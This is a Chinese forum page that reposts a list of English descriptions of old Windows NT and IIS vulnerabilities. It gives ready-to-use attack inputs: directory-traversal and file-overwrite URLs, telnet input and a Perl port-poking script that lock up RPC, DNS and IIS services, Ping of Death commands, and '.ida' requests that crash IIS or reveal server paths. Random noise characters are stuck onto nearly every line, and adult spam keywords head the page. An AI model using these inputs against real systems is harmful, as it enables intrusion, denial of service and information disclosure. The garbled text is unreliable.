久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊

            QQ登錄

            只需一步,快速開始

            NT的漏洞及描述(英文)

            [復制鏈接]
            1#
            發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
            受影響系統(tǒng):4.0,iis 1.0: U3 w/ D2 z, i  S, @5 \3 W3 A9 Z: w
            A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.% Y" J0 |1 D6 k
            0 {9 D  V1 l8 R
            A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
            " |0 p" t* X2 G8 W% J4 y" ~( K% [4 J0 m, ?7 {
            By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
              G" y- D: a5 ?' [, k3 v0 ]
            * Z, q/ i5 h/ y+ l--------------------------------------------------------------------
            / k# _' H2 d! P  |
            ; n# s7 `7 Q2 {+ w! G2 o3 y受影響系統(tǒng):4.02 A% ]" b5 V% j# o2 |0 X+ G+ V1 l2 v
            A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
            : @8 L$ R. I; ?6 S! D  g' x4 w2 J, V- d/ }  S9 ?4 ?
            If the file 'target.bat' exists, the file will be truncated.
            3 M7 l) Q; I* ]" I; h- Y. R7 M' V9 M

            : O$ S5 d  }$ p0 ?7 YA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.4 J, C  S  J  d, h

            2 a% \4 r9 }9 `* g% F: d/ d----------------------------------------------------------------------
            & [0 v" ]/ L0 p- b% \4 \; R
            ' V6 n6 k$ C! }( A2 @* y) c9 e受影響系統(tǒng):3.51,4.0
            ( N( z" [9 u1 m' q9 `# CMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.3 F7 b- p( j, z9 Y5 j0 e/ E
            % |4 k2 R$ S, u% N
            The following steps;3 k0 q8 }/ Q1 K* {) m  N

            ) k% c5 ^: |3 M0 iTelnet to an NT 4.0 system on port 135 ; z+ d* D! X: W
            Type about 10 characters followed by a <CR>
            0 S7 {1 L5 g/ [' lExit Telnet # f8 Z. \- ]6 b8 ]% W4 u3 @
            results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.% W' m# `3 \. Z' r0 g4 N

            & d! P# e7 b& oWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
            5 N( i2 F+ m) n; S5 A/ q9 Z( [* @/ B
            The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.; @: k0 k+ f! t5 g/ L* N! d( ?

            ( }& B  e8 @) P6 q; F3 L& nIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
            & d( X1 K) G7 a  a$ e7 c: _. H* @6 Q; ^- P1 K7 k/ I  I% D
            The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):( V0 ]0 p" b2 j$ {
            4 |$ D6 Q8 O9 Z9 D6 S( R
            /*begin poke code*/
            - \, _  j0 p) D/ r1 u0 q4 r# E# r5 A' L
            use Socket;& B3 a# ^7 q+ i! \" D
            use FileHandle;: i) X# W0 V# Q) d( V& ~8 q
            require "chat2.pl";; R8 `& J! [- m8 l4 i/ g& ~0 G* [

            . e0 F: ]8 O# Y+ Q: ]) ?$systemname = $ARGV[0] && shift;
            5 S% x8 ^; M" t" E" d
            4 @! |- h3 h6 {6 V/ J5 p% e) m$verbose = 1; # tell me what you're hitting& |* u0 W; `/ x% c
            $knownports = 1; # don't hit known problem ports5 \1 e, G9 L' @* p- D
            for ($port = $0; $port<65535; $port++)
            & l5 S* w& z4 s- w  a+ ~/ r( Y{
            # R% u& l3 t$ t/ w1 p% f$ w: b, q' h! f0 ]6 u* z; m. J# @

              c2 s4 v' G& Hif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
            ! e0 y( @" x3 T/ Bnext;
            2 g, o) z1 R9 T# `: C, o: E* g$ R}9 W7 @# E# @6 y5 U- G* X" `
            $fh = chat::open_port($systemname, $port);
            , j5 v* _' E5 W- L" U( ?$ A4 e  ichat::print ($fh,"This is about ten characters or more");
            7 P1 N5 ?* Z8 K5 V* b( @7 @/ |$ A$ i0 Uif ($verbose) {
            3 u, M4 K4 h+ {$ W; Aprint "Trying port: $port\n";" l6 G, j- C/ @# E
            }
            8 Y. p9 b4 Y5 H" l  K3 `' Kchat::close($fh);9 s: R6 S/ S6 X& H' P! P4 E

            & Y# t9 H. g  R5 K# H}
            3 b. f$ m8 u" u5 h3 _' n4 l) ]5 ]( }  j$ |) F) N( T8 z

            2 p3 I# Y4 S% ~+ M/*end poke code*/
            4 d3 A/ @% e3 {, j3 N" i: G( |9 h% T# Z) _7 s, y' X, W& U9 }) _
            Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername- D9 W$ B$ R8 U4 `9 B- \
            " t0 r3 P) ]6 o4 N) |
            --------------------------------------------------------------------------------
            7 X8 C% m( g1 K  X, O* i* a' e  t6 z. E0 Q
            受影響系統(tǒng):4.0
            9 G( o3 N- t( E9 S+ {0 uUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.' G6 p, F) N% \: ~9 Z: D& {1 A

            - c! x8 E- J7 {2 I  l* iThis attack causes Dr. Watson to display an alert window and to log an error: + i% V! C, _& d( M, |& [

            : E0 B4 Q" _, w5 L% H"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
            5 l9 L1 R0 C: k4 E4 O; N; _# S* p3 m. a
            --------------------------------------------------------------------------------4 Q. c3 I+ C' U* C: x' S
            0 y4 ~! v6 g- g' v
            受影響系統(tǒng):3.51,4.0
            ( }$ k% h9 K3 Z% LLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
            ( _7 K5 r& g+ s- }( K
            $ Z- P- x2 \. @8 r/ zSTOP: 0X0000001E
            & ]7 v1 S# M$ a( ]KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS! n0 l; q1 K1 b- d. G- J1 L8 ?' h
            # @+ ?* k6 x$ D* ]9 r  z" ~
            -OR-# A+ L. d; ?3 t# Y! c) ?4 Y
            5 W2 V# @, L# _; A5 p- q
            STOP: 0x0000000A
            2 }& f% ?- U* Y* L( P* A7 k% P$ ]IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
            7 Q1 ?$ J9 D% L7 E: y( h( }
            # w: X  r9 {7 g( @0 eNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
            / T9 T, j3 a' j
            3 K0 y, }$ y+ a8 v. n7 x4 B--------------------------------------------------------------------------------
            ' V" h6 Y. P7 T
            : |9 n3 M# W+ v2 rMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
            , T% d- y- e$ {1 c
            2 ~1 g) p' ]6 M$ K! D--------------------------------------------------------
            7 A' {. [  e3 X" o( m
            % E/ k- g, I8 J! D0 ^% }' n+ ]& tIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
            您需要登錄后才可以回帖 登錄 | 注冊

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

            GMT+8, 2025-5-20 11:19

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復 返回頂部 返回列表